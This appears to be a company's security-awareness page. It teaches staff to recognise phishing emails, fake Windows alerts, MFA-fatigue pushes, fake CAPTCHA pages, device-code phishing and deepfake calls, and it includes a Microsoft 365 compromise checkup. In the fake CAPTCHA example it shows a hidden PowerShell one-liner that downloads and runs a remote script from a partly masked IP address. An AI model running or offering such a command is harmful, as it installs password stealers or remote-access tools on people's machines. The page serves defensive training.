Everything your team needs to spot a phishing email, recognize the scams that follow, and check whether an account has already been compromised. Three chapters, plain English, current for 2026.
Eight red flags hidden in three emails. Hover each one to learn why it works and what to do instead.
Read chapter →Rebuilt from attacks our team has pulled out of client inboxes, plus how to shut each one down.
Read chapter →Six warning signs and a five-step Microsoft 365 checkup you can run in ten minutes.
Read chapter →Three real-looking emails, eight red flags hidden inside them. Hover anything that glows and the panel on the right explains why it works and what to do instead. Find all eight and you will catch most of what lands in your inbox.
Dear user,
Our records shows your mailbox has reach 98% of it's storage limit and incoming messages may soon be rejected.
To upgrade your mailbox, open the attached summary and follow the steps inside.
Hello,
Your organization now requires multifactor authentication for all accounts. To keep access to Outlook, Teams, and OneDrive, link the Microsoft Authenticator app to your account.
Accounts that are not linked within 48 hours will be signed out of all devices until setup is complete.
Anything that glows is a red flag. Hover it and this card explains why it works on people and what to do instead. There are eight to find across the three example cards. Use the arrows, tabs, or the flip button to move between them.
Two yeses or more to the wrong questions: report it, do not reply.
Bad grammar used to catch most phishing. Generated emails now read perfectly, and they are personalized with details scraped from LinkedIn and your website. Lean on the sender address, the link, and the request instead.
"Scan to enable two-factor" and "scan to view your document" emails slip past link filters because the URL is in an image. Never scan a code from an email. Type the site address yourself.
If your Authenticator app asks you to approve a sign-in while you are not signing in, someone has your password. Tap Deny, report it, and change the password right away.
Rebuilt from real attacks our team has removed from client inboxes. Names and companies changed, tricks identical. Under each one: the single detail that gives it away.
Questionable activity was discovered to be associated with your device.
Contact Microsoft Windows Tech Support as soon as possible.
This is a web page pretending to be Windows. It fills the screen, plays a siren, and shows a phone number. In 99% of cases nothing is installed. The goal is to get you on the phone so a "technician" can take remote control and charge your card. You land on it from a mistyped address, a bad ad, or a link in an email.
These pop-ups look like antivirus or Windows alerts but come from your browser. Somewhere along the way a website asked to show notifications and you clicked Allow, usually disguised as "prove you are not a robot" or "click Allow to play the video." Every button leads to a tech-support scam or a malware download.
chrome://settings/content/notifications in the address bar and remove any site you do not recognize.edge://settings/content/notifications and do the same.chrome://extensions or edge://extensions and remove anything you did not install on purpose.Outlook · Lagos, Nigeria · Chrome on Linux
The attacker already has your password. They trigger sign-in after sign-in so your phone keeps buzzing, then text you pretending to be IT so you approve one "to make it stop." One tap and they are in. No IT team asks you to approve a prompt or read back a code.
Type the name of a program, folder, document, or Internet resource, and Windows will open it for you.
powershell -w hidden -c "irm http://185.203.x.x/a.ps1 | iex"The page looks like a normal bot check, but the steps tell you to press Win + R, then Ctrl + V, then Enter. The site has silently copied a PowerShell command to your clipboard. Following the steps runs it, and it installs a password stealer or remote-access tool in seconds. No antivirus prompt, because you ran it yourself.
Marcus Thompson has shared a document with you. Open
Copy this verification code, then continue to Microsoft and paste it to open the file.
BQ7X4KLMCopyContinue to Microsoft →Enter the code displayed on your app or device.
It starts with a "shared a document with you" email. The Open button lands on a look-alike page that gives you a verification code and a "Continue to Microsoft" button. That button goes to the real Microsoft sign-in page, padlock and all. The code belongs to a sign-in the attacker started on their own computer. When you paste it and sign in, Microsoft hands them your session, MFA included, and they now have full access to your account.
mysignins.microsoft.com and choose Sign out everywhere.
A few seconds of audio from a voicemail or webinar is enough to clone a voice. Live face-swap tools put that person on a video call. The "CFO" on the call asks finance to wire a deposit today and keep it quiet until the deal closes. Everyone on the call recognizes the face and voice, and the money is gone. Attackers use it for wires, payroll changes, gift cards, and password resets.
Every hack is different, but the first signs are the same. If any of these feel familiar, run the checkup below. It takes about ten minutes and works for any Microsoft 365 business account.
Type the address yourself in the address bar at the top of the browser, never in a search box. Scammers buy search ads that look exactly like Microsoft and lead to fake sign-in pages.
Click your photo or initials in the top-right corner, choose View account, then My sign-ins. You can also go straight to mysignins.microsoft.com.
Every phone number, email address, and Authenticator app listed here can be used to get into your account. Attackers add their own so they can get back in even after you change your password.
Open Outlook on the web at outlook.office.com, click the gear icon in the top right, then Mail. The same settings exist in the new Outlook desktop app under the same gear.
Order matters. If you change the password first, the attacker's backup phone number still lets them straight back in.
The Threat Test drops ten real attacks in your inbox and scores how many red flags you catch. Five minutes, no hints, and a Certified Defender certificate if you score 90% or better.
Wireguided clients get incident response around the clock. Not a client yet? Call anyway. We will walk you through the first hour, and there is no charge for the conversation.